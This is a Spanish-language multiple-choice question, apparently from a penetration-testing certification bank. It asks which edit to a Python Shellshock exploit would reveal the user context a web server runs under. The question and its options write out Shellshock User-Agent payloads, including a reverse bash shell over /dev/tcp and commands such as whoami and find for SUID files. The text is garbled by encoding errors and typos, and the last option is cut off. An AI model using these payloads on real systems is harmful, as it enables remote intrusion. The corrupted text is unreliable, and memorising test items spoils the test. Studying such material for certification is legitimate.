Un probador de penetración descubre un servidor web vulnerable en 10.10.1.1. A continuación, el probador edita un script Python que envía un exploit web y se encuentra con el siguiente código: exploit = {`User-Agent`: `() { ignored;};/bin/bash -i>& /dev/tcp/127.0.0.1/9090 0>&1`, `Accept`: `text/html,application/ xhtml+xml,application/xml`}¿Cuál de las siguientes ediciones debería hacer el probador en el script para determinar el contexto de usuario en el que se está ejecutando el servidor?
A. xploit = {ג€User-Agentג€: ג€() { ignorored;};/bin/bash -i id;whoamiג€, ג€Acceptג€: ג€text/html,application/xhtml +xml,application/xmlג€}
B. xploit = {ג€User-Agentג€: ג€() { ignorored;};/bin/bash -i>& find / -perm -4000ג€, ג€Acceptג€: ג€text/html,application/xhtml +xml,application/xmlג€}
C. xploit = {ג€User-Agentג€: ג€() {ignored;};/bin/sh -i ps -efג€ 0>&1ג€, ג€Acceptג€: ג€text/html,application/xhtml +xml,application/xmlג€}
D. xploit = {ג€User-Agentג€: ג€() { ignorored;};/bin/bash -i>& /dev/tcp/10